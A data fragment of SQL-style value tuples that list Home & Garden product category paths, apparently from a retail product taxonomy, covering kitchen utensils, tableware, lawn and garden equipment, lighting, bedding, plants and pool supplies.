(3651, 3651, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Pizza Cutters'),
(3652, 3652, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Ricers'),
(3653, 3653, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Rolling Pin Accessories'),
(3654, 3654, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Rolling Pin Accessories > Rolling Pin Covers & Sleeves'),
(3655, 3655, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Rolling Pin Accessories > Rolling Pin Rings'),
(3656, 3656, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Rolling Pins'),
(3657, 3657, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Salad Dressing Mixers & Shakers'),
(3658, 3658, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Salad Spinners'),
(3659, 3659, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Scoops'),
(3660, 3660, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Scoops > Ice Cream Scoops'),
(3661, 3661, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Scoops > Ice Scoops'),
(3662, 3662, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Scoops > Melon Ballers'),
(3663, 3663, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Scoops > Popcorn & French Fry Scoops'),
(3664, 3664, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Sink Caddies'),
(3665, 3665, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Sink Mats & Grids'),
(3666, 3666, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Slotted Spoons'),
(3667, 3667, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Spatulas'),
(3668, 3668, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Spice Grinder Accessories'),
(3669, 3669, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Spice Grinders'),
(3670, 3670, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Spoon Rests'),
(3671, 3671, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Sugar Dispensers'),
(3672, 3672, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Sushi Mats'),
(3673, 3673, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Tea Strainers'),
(3674, 3674, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Tongs'),
(3675, 3675, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Whisks'),
(3676, 3676, 0, 'Home & Garden > Kitchen & Dining > Prefabricated Kitchens & Kitchenettes'),
(3677, 3677, 0, 'Home & Garden > Kitchen & Dining > Tableware'),
(3678, 3678, 0, 'Home & Garden > Kitchen & Dining > Tableware > Coffee & Tea Sets'),
(3679, 3679, 0, 'Home & Garden > Kitchen & Dining > Tableware > Coffee Servers & Tea Pots'),
(3680, 3680, 0, 'Home & Garden > Kitchen & Dining > Tableware > Dinnerware'),
(3681, 3681, 0, 'Home & Garden > Kitchen & Dining > Tableware > Dinnerware > Bowls'),
(3682, 3682, 0, 'Home & Garden > Kitchen & Dining > Tableware > Dinnerware > Dinnerware Sets'),
(3683, 3683, 0, 'Home & Garden > Kitchen & Dining > Tableware > Dinnerware > Plates'),
(3684, 3684, 0, 'Home & Garden > Kitchen & Dining > Tableware > Drinkware'),
(3685, 3685, 0, 'Home & Garden > Kitchen & Dining > Tableware > Drinkware > Beer Glasses'),
(3686, 3686, 0, 'Home & Garden > Kitchen & Dining > Tableware > Drinkware > Coffee & Tea Cups'),
(3687, 3687, 0, 'Home & Garden > Kitchen & Dining > Tableware > Drinkware > Coffee & Tea Saucers'),
(3688, 3688, 0, 'Home & Garden > Kitchen & Dining > Tableware > Drinkware > Drinkware Sets'),
(3689, 3689, 0, 'Home & Garden > Kitchen & Dining > Tableware > Drinkware > Mugs'),
(3690, 3690, 0, 'Home & Garden > Kitchen & Dining > Tableware > Drinkware > Shot Glasses'),
(3691, 3691, 0, 'Home & Garden > Kitchen & Dining > Tableware > Drinkware > Stemware'),
(3692, 3692, 0, 'Home & Garden > Kitchen & Dining > Tableware > Drinkware > Tumblers'),
(3693, 3693, 0, 'Home & Garden > Kitchen & Dining > Tableware > Flatware'),
(3694, 3694, 0, 'Home & Garden > Kitchen & Dining > Tableware > Flatware > Chopstick Accessories'),
(3695, 3695, 0, 'Home & Garden > Kitchen & Dining > Tableware > Flatware > Chopsticks'),
(3696, 3696, 0, 'Home & Garden > Kitchen & Dining > Tableware > Flatware > Flatware Sets'),
(3697, 3697, 0, 'Home & Garden > Kitchen & Dining > Tableware > Flatware > Forks'),
(3698, 3698, 0, 'Home & Garden > Kitchen & Dining > Tableware > Flatware > Spoons'),
(3699, 3699, 0, 'Home & Garden > Kitchen & Dining > Tableware > Flatware > Table Knives'),
(3700, 3700, 0, 'Home & Garden > Kitchen & Dining > Tableware > Salt & Pepper Shakers'),
(3701, 3701, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware'),
(3702, 3702, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware > Butter Dishes'),
(3703, 3703, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware > Cake Boards'),
(3704, 3704, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware > Cake Stands'),
(3705, 3705, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware > Egg Cups'),
(3706, 3706, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware > Gravy Boats'),
(3707, 3707, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware > Punch Bowls'),
(3708, 3708, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware > Serving Pitchers & Carafes'),
(3709, 3709, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware > Serving Platters'),
(3710, 3710, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware > Serving Trays'),
(3711, 3711, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware > Sugar Bowls & Creamers'),
(3712, 3712, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware > Tureens'),
(3713, 3713, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware Accessories'),
(3714, 3714, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware Accessories > Punch Bowl Stands'),
(3715, 3715, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware Accessories > Tureen Lids'),
(3716, 3716, 0, 'Home & Garden > Kitchen & Dining > Tableware > Serveware Accessories > Tureen Stands'),
(3717, 3717, 0, 'Home & Garden > Kitchen & Dining > Tableware > Tablecloth Clips & Weights'),
(3718, 3718, 0, 'Home & Garden > Kitchen & Dining > Tableware > Trivets'),
(3719, 3719, 0, 'Home & Garden > Lawn & Garden'),
(3720, 3720, 0, 'Home & Garden > Lawn & Garden > Gardening'),
(3721, 3721, 0, 'Home & Garden > Lawn & Garden > Gardening > Composting'),
(3722, 3722, 0, 'Home & Garden > Lawn & Garden > Gardening > Composting > Compost'),
(3723, 3723, 0, 'Home & Garden > Lawn & Garden > Gardening > Composting > Compost Aerators'),
(3724, 3724, 0, 'Home & Garden > Lawn & Garden > Gardening > Composting > Composters'),
(3725, 3725, 0, 'Home & Garden > Lawn & Garden > Gardening > Disease Control'),
(3726, 3726, 0, 'Home & Garden > Lawn & Garden > Gardening > Fertilizers'),
(3727, 3727, 0, 'Home & Garden > Lawn & Garden > Gardening > Garden Pot Saucers & Trays'),
(3728, 3728, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Accessories'),
(3729, 3729, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Accessories > Gardening Scooters, Seats & Kneelers'),
(3730, 3730, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Accessories > Gardening Totes'),
(3731, 3731, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Accessories > Potting Benches'),
(3732, 3732, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tool Accessories'),
(3733, 3733, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tool Accessories > Gardening Tool Handles'),
(3734, 3734, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tool Accessories > Gardening Tool Heads'),
(3735, 3735, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tool Accessories > Wheelbarrow Parts'),
(3736, 3736, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools'),
(3737, 3737, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Bulb Planting Tools'),
(3738, 3738, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Cultivating Tools'),
(3739, 3739, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Gardening Forks'),
(3740, 3740, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Gardening Sickles & Machetes'),
(3741, 3741, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Gardening Trowels'),
(3742, 3742, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Lawn & Garden Sprayers'),
(3743, 3743, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Lawn Rollers'),
(3744, 3744, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Pruning Saws'),
(3745, 3745, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Pruning Shears'),
(3746, 3746, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Rakes'),
(3747, 3747, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Shovels & Spades'),
(3748, 3748, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Spreaders'),
(3749, 3749, 0, 'Home & Garden > Lawn & Garden > Gardening > Gardening Tools > Wheelbarrows'),
(3750, 3750, 0, 'Home & Garden > Lawn & Garden > Gardening > Greenhouses'),
(3751, 3751, 0, 'Home & Garden > Lawn & Garden > Gardening > Herbicides'),
(3752, 3752, 0, 'Home & Garden > Lawn & Garden > Gardening > Landscape Fabric'),
(3753, 3753, 0, 'Home & Garden > Lawn & Garden > Gardening > Landscape Fabric Accessories'),
(3754, 3754, 0, 'Home & Garden > Lawn & Garden > Gardening > Landscape Fabric Accessories > Landscape Fabric Staples & Pins'),
(3755, 3755, 0, 'Home & Garden > Lawn & Garden > Gardening > Landscape Fabric Accessories > Landscape Fabric Tape'),
(3756, 3756, 0, 'Home & Garden > Lawn & Garden > Gardening > Mulch'),
(3757, 3757, 0, 'Home & Garden > Lawn & Garden > Gardening > Plant Cages & Supports'),
(3758, 3758, 0, 'Home & Garden > Lawn & Garden > Gardening > Plant Stands'),
(3759, 3759, 0, 'Home & Garden > Lawn & Garden > Gardening > Pot & Planter Liners'),
(3760, 3760, 0, 'Home & Garden > Lawn & Garden > Gardening > Pots & Planters'),
(3761, 3761, 0, 'Home & Garden > Lawn & Garden > Gardening > Rain Barrels'),
(3762, 3762, 0, 'Home & Garden > Lawn & Garden > Gardening > Sands & Soils'),
(3763, 3763, 0, 'Home & Garden > Lawn & Garden > Outdoor Living'),
(3764, 3764, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Awning Accessories'),
(3765, 3765, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Awnings'),
(3766, 3766, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Hammock Parts & Accessories'),
(3767, 3767, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Hammocks'),
(3768, 3768, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Blankets'),
(3769, 3769, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Blankets > Beach Mats'),
(3770, 3770, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Blankets > Picnic Blankets'),
(3771, 3771, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Blankets > Poncho Liners'),
(3772, 3772, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Structures'),
(3773, 3773, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Structures > Canopies & Gazebos'),
(3774, 3774, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Structures > Canopy & Gazebo Accessories'),
(3775, 3775, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Structures > Canopy & Gazebo Accessories > Canopy & Gazebo Enclosure Kits'),
(3776, 3776, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Structures > Canopy & Gazebo Accessories > Canopy & Gazebo Frames'),
(3777, 3777, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Structures > Canopy & Gazebo Accessories > Canopy & Gazebo Tops'),
(3778, 3778, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Structures > Canopy & Gazebo Accessories > Canopy Poles'),
(3779, 3779, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Structures > Canopy & Gazebo Accessories > Canopy Weights'),
(3780, 3780, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Structures > Garden Arches, Trellises, Arbors & Pergolas'),
(3781, 3781, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Structures > Garden Bridges'),
(3782, 3782, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Structures > Sheds, Garages & Carports'),
(3783, 3783, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Umbrella & Sunshade Accessories'),
(3784, 3784, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Umbrella & Sunshade Accessories > Outdoor Umbrella & Sunshade Fabric'),
(3785, 3785, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Umbrella & Sunshade Accessories > Outdoor Umbrella Bases'),
(3786, 3786, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Umbrella & Sunshade Accessories > Outdoor Umbrella Covers'),
(3787, 3787, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Umbrella & Sunshade Accessories > Outdoor Umbrella Enclosure Kits'),
(3788, 3788, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Umbrella & Sunshade Accessories > Outdoor Umbrella Lights'),
(3789, 3789, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Outdoor Umbrellas & Sunshades'),
(3790, 3790, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Porch Swing Accessories'),
(3791, 3791, 0, 'Home & Garden > Lawn & Garden > Outdoor Living > Porch Swings'),
(3792, 3792, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment'),
(3793, 3793, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Chainsaws'),
(3794, 3794, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Grass Edgers'),
(3795, 3795, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Hedge Trimmers'),
(3796, 3796, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Lawn Aerators & Dethatchers'),
(3797, 3797, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Lawn Mowers'),
(3798, 3798, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Lawn Mowers > Riding Mowers'),
(3799, 3799, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Lawn Mowers > Robotic Mowers'),
(3800, 3800, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Lawn Mowers > Tow-Behind Mowers'),
(3801, 3801, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Lawn Mowers > Walk-Behind Mowers'),
(3802, 3802, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Lawn Vacuums'),
(3803, 3803, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Leaf Blowers'),
(3804, 3804, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Outdoor Power Equipment Base Units'),
(3805, 3805, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Outdoor Power Equipment Sets'),
(3806, 3806, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Power Sweepers'),
(3807, 3807, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Power Tillers & Cultivators'),
(3808, 3808, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Pressure Washers'),
(3809, 3809, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Snow Blowers'),
(3810, 3810, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Tractors'),
(3811, 3811, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment > Weed Trimmers'),
(3812, 3812, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories'),
(3813, 3813, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Chainsaw Accessories'),
(3814, 3814, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Chainsaw Accessories > Chainsaw Bars'),
(3815, 3815, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Chainsaw Accessories > Chainsaw Chains'),
(3816, 3816, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Grass Edger Accessories'),
(3817, 3817, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Hedge Trimmer Accessories'),
(3818, 3818, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories'),
(3819, 3819, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Brush Mower Attachments'),
(3820, 3820, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Mower Bags'),
(3821, 3821, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Mower Belts'),
(3822, 3822, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Mower Blades'),
(3823, 3823, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Mower Covers'),
(3824, 3824, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Mower Mulch Kits'),
(3825, 3825, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Mower Mulch Plugs & Plates'),
(3826, 3826, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Mower Pulleys & Idlers'),
(3827, 3827, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Mower Tire Tubes'),
(3828, 3828, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Mower Tires'),
(3829, 3829, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Mower Wheels'),
(3830, 3830, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Striping Kits'),
(3831, 3831, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Lawn Mower Accessories > Lawn Sweepers'),
(3832, 3832, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Leaf Blower Accessories'),
(3833, 3833, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Leaf Blower Accessories > Leaf Blower Tubes'),
(3834, 3834, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Multifunction Outdoor Power Equipment Attachments'),
(3835, 3835, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Multifunction Outdoor Power Equipment Attachments > Grass Edger Attachments'),
(3836, 3836, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Multifunction Outdoor Power Equipment Attachments > Ground & Leaf Blower Attachments'),
(3837, 3837, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Multifunction Outdoor Power Equipment Attachments > Hedge Trimmer Attachments'),
(3838, 3838, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Multifunction Outdoor Power Equipment Attachments > Pole Saw Attachments'),
(3839, 3839, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Multifunction Outdoor Power Equipment Attachments > Tiller & Cultivator Attachments'),
(3840, 3840, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Multifunction Outdoor Power Equipment Attachments > Weed Trimmer Attachments'),
(3841, 3841, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Outdoor Power Equipment Batteries'),
(3842, 3842, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Pressure Washer Accessories'),
(3843, 3843, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Snow Blower Accessories'),
(3844, 3844, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Tractor Parts & Accessories'),
(3845, 3845, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Tractor Parts & Accessories > Tractor Tires'),
(3846, 3846, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Tractor Parts & Accessories > Tractor Wheels'),
(3847, 3847, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Weed Trimmer Accessories'),
(3848, 3848, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Weed Trimmer Accessories > Weed Trimmer Blades & Spools'),
(3849, 3849, 0, 'Home & Garden > Lawn & Garden > Outdoor Power Equipment Accessories > Weed Trimmer Accessories > Weed Trimmer Spool Covers'),
(3850, 3850, 0, 'Home & Garden > Lawn & Garden > Snow Removal'),
(3851, 3851, 0, 'Home & Garden > Lawn & Garden > Snow Removal > Ice Scrapers & Snow Brushes'),
(3852, 3852, 0, 'Home & Garden > Lawn & Garden > Snow Removal > Snow Shovels'),
(3853, 3853, 0, 'Home & Garden > Lawn & Garden > Watering & Irrigation'),
(3854, 3854, 0, 'Home & Garden > Lawn & Garden > Watering & Irrigation > Garden Hose Fittings & Valves'),
(3855, 3855, 0, 'Home & Garden > Lawn & Garden > Watering & Irrigation > Garden Hose Spray Nozzles'),
(3856, 3856, 0, 'Home & Garden > Lawn & Garden > Watering & Irrigation > Garden Hoses'),
(3857, 3857, 0, 'Home & Garden > Lawn & Garden > Watering & Irrigation > Sprinkler Accessories'),
(3858, 3858, 0, 'Home & Garden > Lawn & Garden > Watering & Irrigation > Sprinkler Accessories > Sprinkler Controls'),
(3859, 3859, 0, 'Home & Garden > Lawn & Garden > Watering & Irrigation > Sprinkler Accessories > Sprinkler Valves'),
(3860, 3860, 0, 'Home & Garden > Lawn & Garden > Watering & Irrigation > Sprinklers & Sprinkler Heads'),
(3861, 3861, 0, 'Home & Garden > Lawn & Garden > Watering & Irrigation > Watering Can Accesssories'),
(3862, 3862, 0, 'Home & Garden > Lawn & Garden > Watering & Irrigation > Watering Cans'),
(3863, 3863, 0, 'Home & Garden > Lawn & Garden > Watering & Irrigation > Watering Globes & Spikes'),
(3864, 3864, 0, 'Home & Garden > Lighting'),
(3865, 3865, 0, 'Home & Garden > Lighting > Emergency Lighting'),
(3866, 3866, 0, 'Home & Garden > Lighting > Floating & Submersible Lights'),
(3867, 3867, 0, 'Home & Garden > Lighting > Flood & Spot Lights'),
(3868, 3868, 0, 'Home & Garden > Lighting > In-Ground Lights'),
(3869, 3869, 0, 'Home & Garden > Lighting > Lamps'),
(3870, 3870, 0, 'Home & Garden > Lighting > Landscape Pathway Lighting'),
(3871, 3871, 0, 'Home & Garden > Lighting > Light Bulbs'),
(3872, 3872, 0, 'Home & Garden > Lighting > Light Bulbs > Compact Fluorescent Lamps'),
(3873, 3873, 0, 'Home & Garden > Lighting > Light Bulbs > Fluorescent Tubes'),
(3874, 3874, 0, 'Home & Garden > Lighting > Light Bulbs > Incandescent Light Bulbs'),
(3875, 3875, 0, 'Home & Garden > Lighting > Light Bulbs > LED Light Bulbs'),
(3876, 3876, 0, 'Home & Garden > Lighting > Light Ropes & Strings'),
(3877, 3877, 0, 'Home & Garden > Lighting > Lighting Fixtures'),
(3878, 3878, 0, 'Home & Garden > Lighting > Lighting Fixtures > Cabinet Light Fixtures'),
(3879, 3879, 0, 'Home & Garden > Lighting > Lighting Fixtures > Ceiling Light Fixtures'),
(3880, 3880, 0, 'Home & Garden > Lighting > Lighting Fixtures > Chandeliers'),
(3881, 3881, 0, 'Home & Garden > Lighting > Lighting Fixtures > Wall Light Fixtures'),
(3882, 3882, 0, 'Home & Garden > Lighting > Night Lights & Ambient Lighting'),
(3883, 3883, 0, 'Home & Garden > Lighting > Picture Lights'),
(3884, 3884, 0, 'Home & Garden > Lighting > Tiki Torches & Oil Lamps'),
(3885, 3885, 0, 'Home & Garden > Lighting > Track Lighting'),
(3886, 3886, 0, 'Home & Garden > Lighting > Track Lighting > Track Lighting Accessories'),
(3887, 3887, 0, 'Home & Garden > Lighting > Track Lighting > Track Lighting Fixtures'),
(3888, 3888, 0, 'Home & Garden > Lighting > Track Lighting > Track Lighting Rails'),
(3889, 3889, 0, 'Home & Garden > Lighting Accessories'),
(3890, 3890, 0, 'Home & Garden > Lighting Accessories > Lamp Post Bases'),
(3891, 3891, 0, 'Home & Garden > Lighting Accessories > Lamp Post Mounts'),
(3892, 3892, 0, 'Home & Garden > Lighting Accessories > Lamp Shades'),
(3893, 3893, 0, 'Home & Garden > Lighting Accessories > Lighting Timers'),
(3894, 3894, 0, 'Home & Garden > Lighting Accessories > Oil Lamp Fuel'),
(3895, 3895, 0, 'Home & Garden > Linens & Bedding'),
(3896, 3896, 0, 'Home & Garden > Linens & Bedding > Bedding'),
(3897, 3897, 0, 'Home & Garden > Linens & Bedding > Bedding > Bed Canopies'),
(3898, 3898, 0, 'Home & Garden > Linens & Bedding > Bedding > Bed Sheets'),
(3899, 3899, 0, 'Home & Garden > Linens & Bedding > Bedding > Bedskirts'),
(3900, 3900, 0, 'Home & Garden > Linens & Bedding > Bedding > Blankets'),
(3901, 3901, 0, 'Home & Garden > Linens & Bedding > Bedding > Duvet Covers'),
(3902, 3902, 0, 'Home & Garden > Linens & Bedding > Bedding > Mattress Protectors'),
(3903, 3903, 0, 'Home & Garden > Linens & Bedding > Bedding > Mattress Protectors > Mattress Encasements'),
(3904, 3904, 0, 'Home & Garden > Linens & Bedding > Bedding > Mattress Protectors > Mattress Pads'),
(3905, 3905, 0, 'Home & Garden > Linens & Bedding > Bedding > Nap Mats'),
(3906, 3906, 0, 'Home & Garden > Linens & Bedding > Bedding > Pillowcases & Shams'),
(3907, 3907, 0, 'Home & Garden > Linens & Bedding > Bedding > Pillows'),
(3908, 3908, 0, 'Home & Garden > Linens & Bedding > Bedding > Quilts & Comforters'),
(3909, 3909, 0, 'Home & Garden > Linens & Bedding > Kitchen Linens Sets'),
(3910, 3910, 0, 'Home & Garden > Linens & Bedding > Table Linens'),
(3911, 3911, 0, 'Home & Garden > Linens & Bedding > Table Linens > Cloth Napkins'),
(3912, 3912, 0, 'Home & Garden > Linens & Bedding > Table Linens > Doilies'),
(3913, 3913, 0, 'Home & Garden > Linens & Bedding > Table Linens > Placemats'),
(3914, 3914, 0, 'Home & Garden > Linens & Bedding > Table Linens > Table Runners'),
(3915, 3915, 0, 'Home & Garden > Linens & Bedding > Table Linens > Table Skirts'),
(3916, 3916, 0, 'Home & Garden > Linens & Bedding > Table Linens > Tablecloths'),
(3917, 3917, 0, 'Home & Garden > Linens & Bedding > Towels'),
(3918, 3918, 0, 'Home & Garden > Linens & Bedding > Towels > Bath Towels & Washcloths'),
(3919, 3919, 0, 'Home & Garden > Linens & Bedding > Towels > Beach Towels'),
(3920, 3920, 0, 'Home & Garden > Linens & Bedding > Towels > Kitchen Towels'),
(3921, 3921, 0, 'Home & Garden > Parasols & Rain Umbrellas'),
(3922, 3922, 0, 'Home & Garden > Plants'),
(3923, 3923, 0, 'Home & Garden > Plants > Aquatic Plants'),
(3924, 3924, 0, 'Home & Garden > Plants > Flowers'),
(3925, 3925, 0, 'Home & Garden > Plants > Indoor & Outdoor Plants'),
(3926, 3926, 0, 'Home & Garden > Plants > Plant & Herb Growing Kits'),
(3927, 3927, 0, 'Home & Garden > Plants > Seeds'),
(3928, 3928, 0, 'Home & Garden > Plants > Trees'),
(3929, 3929, 0, 'Home & Garden > Pool & Spa'),
(3930, 3930, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories'),
(3931, 3931, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Diving Boards'),
(3932, 3932, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool & Spa Chlorine Generators'),
(3933, 3933, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool & Spa Filters'),
(3934, 3934, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool & Spa Maintenance Kits'),
(3935, 3935, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Brushes & Brooms'),
(3936, 3936, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Cleaner Hoses'),
